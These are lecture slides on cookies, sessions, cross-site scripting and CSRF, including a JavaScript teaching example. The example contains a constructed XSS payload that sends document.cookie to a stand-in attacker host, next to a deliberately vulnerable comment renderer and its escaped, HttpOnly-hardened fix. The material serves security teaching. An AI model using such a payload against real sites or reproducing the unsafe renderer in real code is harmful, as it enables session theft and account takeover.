S23U14438 - Lecture 14 - XSS
Outline
Cookies and Sessions – Refresher
Cross-Site Attacks
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)
COOKIES AND SESSIONS
How things work before we start messing with them….
Web browsing (HTTP) is stateless
The browser does not keep a connection to the server open while you look at a page
You may never return, stay on a page for a long time, or leave after one second
The server still needs to distinguish you from other clients (browsers)
Client-side state is carried in “Cookies”
Server-side state is kept in “Sessions”
Have you noticed how….
The session ID number (sent back by the browser in a cookie) is used to pick from the many sessions that the server has active at any one time
Server software stores in the session the data it wants to carry from one request to the next from the same browser:
Shopping cart
Login information
Cookies and Session IDs
Source: https://cscie12.dce.harvard.edu/lecture_notes/2006-07/20070410/slide46.html
Stateless vs Stateful apps
Sticky sessions: behind a load balancer, all requests from one client are routed to the same back-end server so that its server-side session state can be found
Samy Kamkar
https://www.youtube.com/watch?v=DtnuaHl378M (5 mins)
Two Types of Attack
[Diagram: trusted JavaScript served by the web server sends a legitimate FB request; un-trusted JavaScript running in the same page can do exactly the same, because any JavaScript in the page sends requests and those requests use the session cookie]
ENTER XSS ATTACKS
Channeling Sam’s code to Alice’s browser
Basic trick to XSS Attack
[Diagram: hidden CODE typed in Samy's browser is stored by the site and later delivered to, and executed in, Alice's browser]
Option 1: steal the session cookie and run the attack outside Alice's account, from Samy's own machine
More practical: perform the request from Alice's own browser, where her session cookie is attached automatically
How to prevent it?
Filter input on arrival, and encode output at the point where it is inserted into the page (encoding is what stops the browser treating data as markup)
Knowing the source of the request: the Referer header. Good idea, but it is often stripped out for privacy, so its absence cannot be treated as proof of anything
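As an added example (not code from the lecture slides), the basic trick and its fix side by side: a comment renderer that pastes stored user input straight into HTML, the same renderer with output encoding, and the cookie attributes that limit what a stolen session cookie is worth. The payload, the attacker host `attacker.example` and the cookie name are constructed for the illustration.

```javascript
// Constructed XSS payload of the "steal the cookie" kind: when it runs in
// Alice's browser it ships document.cookie to an attacker-controlled host.
// attacker.example is an assumed, non-existent host.
const CONSTRUCTED_PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c=" +' +
  'encodeURIComponent(document.cookie)</script>';

// Vulnerable: the comment is concatenated into the page as raw HTML, so any
// markup Samy submitted is parsed and executed by Alice's browser.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Output encoding: every character that has meaning in an HTML text or
// attribute context is replaced by its entity, so the browser shows the
// payload as text instead of running it.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: same page, but the untrusted value is encoded at the point of
// insertion. Input filtering on arrival is an extra layer, not a substitute.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Crude check used below: does the rendered HTML still contain a <script>
// element that the browser would execute?
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Defence in depth for the session cookie itself: HttpOnly keeps it out of
// document.cookie (so this payload exfiltrates nothing), Secure keeps it off
// plaintext HTTP, SameSite limits cross-site sends. "sid" is an assumed name.
function sessionCookieHeader(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Usage: compare what Alice's browser would receive in the two cases.
console.log(renderCommentUnsafe(CONSTRUCTED_PAYLOAD));
console.log(renderCommentSafe(CONSTRUCTED_PAYLOAD));
console.log('Set-Cookie: ' + sessionCookieHeader('3'));
```

`escapeHtml` is only correct for the HTML text and quoted-attribute contexts; a value inserted into a `<script>` block, a URL or an event handler needs the encoding for that context instead.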
[Diagrams: Alice holds Session ID 1, Bob Session ID 2, Sam Session ID 3]
Legitimate Cross-Site Request: Sam's own browser sends a request to the web site carrying Sam's Session ID 3
Stealing Alice's Session ID: Sam obtains Alice's Session ID and presents it from his own browser, so the site treats his requests as Alice's
Method 2, Running code in Alice's Browser: if Sam can get Alice to run his code on her browser, Sam's request will use Alice's Session ID 1, so Sam does not need to know Alice's Session ID
Example POST body from a form that carries an anti-CSRF token alongside the field being changed:
csrf=WfF1szMUHhiokx9AHFply5L2xAOfjRkE&email=wiener@normal-user.com
How to prevent it?
Checking the Referer header (commonly used on embedded network devices, which often have no per-session token); it cannot be the only check, because browsers frequently omit the header and a check that accepts a missing Referer fails open
Tying each state-changing request to a per-session, unpredictable token such as the csrf parameter above, which a forged cross-site request cannot supply